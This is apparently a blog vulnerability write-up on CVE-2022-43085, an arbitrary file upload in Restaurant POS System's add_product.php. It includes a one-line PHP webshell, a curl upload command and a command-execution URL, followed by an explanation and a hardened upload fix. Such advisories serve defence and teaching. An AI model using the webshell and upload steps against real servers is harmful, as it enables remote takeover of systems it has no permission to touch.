*Published: June 2024*
CVE-2022-43085 is a critical vulnerability in *Restaurant POS System v1.*: an unrestricted file upload that lets an attacker place an arbitrary file, including a crafted PHP webshell, on the server and then execute it. In this article I walk through what the flaw is, how it works, and an example exploit, then cover the fixes and references for further reading. Let's dive in.
- Type: Arbitrary File Upload → Remote Code Execution
- CVE page: NVD details, https://nvd.nist.gov/vuln/detail/CVE-2022-43085
The weakness is in the file-upload logic of the add_product.php script. The script does not validate what is uploaded (neither the file extension nor the content) and stores the file under a web-accessible directory using the client-supplied name. An attacker can therefore upload PHP code and request it over HTTP; the server parses it as PHP, which gives the attacker command execution as the web server user.
Exploit Details: Step-by-Step Guide
1. Prepare a Webshell
Here's a minimal webshell you can use to test the upload:
```php
<?php system($_GET['cmd']); ?>
```
2. Upload It Through "Add Product"
Suppose the "Add Product" feature lets you upload images for menu items; the parameter name is assumed here to be product_image (read it from the form's HTML, since the real name may differ).
Example curl request:
```sh
curl -F "product_image=@shell.php" -F "product_name=Exploit" http://[victim-site]/add_product.php
```
3. Find the Upload Directory
Usually the script stores the uploaded file in a folder such as /uploads/ or /images/. The form's HTML or the URL of an existing product image tells you the real path.
4. Execute Commands
Open:
```
http://[victim-site]/uploads/shell.php?cmd=whoami
```
If the response contains the web server's account name (for example www-data), the server is executing your file as PHP.
Why the Exploit Works
- Missing file type check: the code never verifies that the upload is really an image, neither by extension nor by inspecting the content.
- Server executes uploaded PHP: the file is saved under its original name in a web-accessible directory, so a request for shell.php is handed to the PHP interpreter like any other script.
Code Snippet From add_product.php (What Might Look Vulnerable)
```php
<?php
// Pseudo-code snippet representing the insecure upload
if (isset($_FILES['product_image'])) {
    // The client-supplied file name is used as-is and nothing about the
    // file (extension, MIME type, content) is checked before it is saved
    move_uploaded_file($_FILES['product_image']['tmp_name'],
                       "uploads/" . $_FILES['product_image']['name']);
    // No file type checks!
}
```
Suggested Fix
A first improvement is to accept only image MIME types:
```php
<?php
$allowed_types = ['image/jpeg', 'image/png'];
if (in_array($_FILES['product_image']['type'], $allowed_types, true)) {
    // proceed with upload
}
```
Be aware that $_FILES['product_image']['type'] is taken from the Content-Type the client sends with the file part, so an attacker can simply set it to image/png while uploading shell.php. On its own this check does not stop the exploit; it has to be combined with an extension allowlist, a server-side content check, a generated file name, and a web-server rule that refuses to execute PHP under uploads/.
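As an added example (not the project's own code, and not the page's snippet above), here is a hardened replacement for the upload block. It assumes the form field is named product_image, that files are stored under uploads/ next to the script, and that only JPEG and PNG product images are needed; adjust those to the real application.

```php
<?php
// Hardened upload handling for add_product.php (added example).
// Assumptions: field name product_image, storage under uploads/, JPEG/PNG only.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads';   // web-served, but PHP execution must be disabled there
const MAX_BYTES  = 2 * 1024 * 1024;        // 2 MiB cap on product images
const ALLOWED    = [                       // extension => MIME type detected from the bytes on disk
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
];

/**
 * Validate one entry of $_FILES and move it into UPLOAD_DIR.
 * Returns the generated file name to store in the product record;
 * throws RuntimeException on any failure so the caller can abort.
 */
function storeProductImage(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or missing');
    }
    // Only accept files that PHP itself received via HTTP POST
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an HTTP upload');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }

    // Extension allowlist on the client name: shell.php, shell.phtml and
    // shell.php.jpg all fail here because only the last extension is taken
    // and it must be in ALLOWED.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('Extension not allowed');
    }

    // Content check: ignore the client-controlled $file['type'] and sniff
    // the temporary file on disk instead.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED[$ext]) {
        throw new RuntimeException('Content does not match extension');
    }
    // getimagesize() returns false for anything it cannot parse as an image
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Not a valid image');
    }

    // Never reuse the client name: random name, allowlisted extension only
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = UPLOAD_DIR . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not save file');
    }
    chmod($dest, 0644);   // readable by the web server, not executable

    return $stored;
}

// Usage inside add_product.php (field name is an assumption)
if (isset($_FILES['product_image'])) {
    try {
        $imageName = storeProductImage($_FILES['product_image']);
        // ... insert $imageName into the product record ...
    } catch (RuntimeException $e) {
        http_response_code(400);
        exit('Invalid image upload');
    }
}
```

Three things do the work here: the extension allowlist (the file can never be saved as .php or a variant), the server-side content check with finfo and getimagesize instead of the client-supplied type, and the random file name. Content checks alone are not sufficient, because a valid image can carry PHP code appended after the image data, so the web server should additionally refuse to execute anything under uploads/ (with Apache and mod_php, `php_flag engine off` in a .htaccess in that directory; with nginx, a location rule that returns 403 for .php paths under /uploads/).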
References
- NVD entry for CVE-2022-43085: https://nvd.nist.gov/vuln/detail/CVE-2022-43085
- Exploit details on Exploit-DB *(example)*
- Common PHP upload mistakes
- OWASP: Unrestricted File Upload, https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
Conclusion
CVE-2022-43085 is a textbook example of how dangerous an arbitrary file upload bug is. It takes little effort for an attacker to gain complete control of the server when basic checks are skipped. Restaurant POS admins must patch this as soon as possible, validate uploads server-side (extension allowlist, content sniffing, generated file names), and block PHP execution in the uploads directory.
Stay safe. Patch your apps. Always validate your uploads!
*If you are interested in a proof-of-concept for live testing or are responsible for patching this vulnerability, always do it in a legal, controlled environment.*
Timeline
Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/02/2022 15:35:00 UTC